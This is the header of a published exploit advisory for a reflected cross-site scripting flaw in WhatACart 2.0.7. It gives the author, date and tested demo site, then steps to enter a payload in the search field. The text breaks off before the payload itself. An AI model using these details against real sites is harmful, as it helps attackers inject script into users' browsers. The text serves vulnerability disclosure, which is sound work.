# Exploit Title: WhatACart Version: 2.0.7 - Reflected XSS # Date: 2023-12-27 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://whatacart.com # Version: 2.0.7 # Tested on: https://whatacart.com/demo 1 ) Go to this page : https://demo.whatacart.com/ 2 ) Write search field this payload :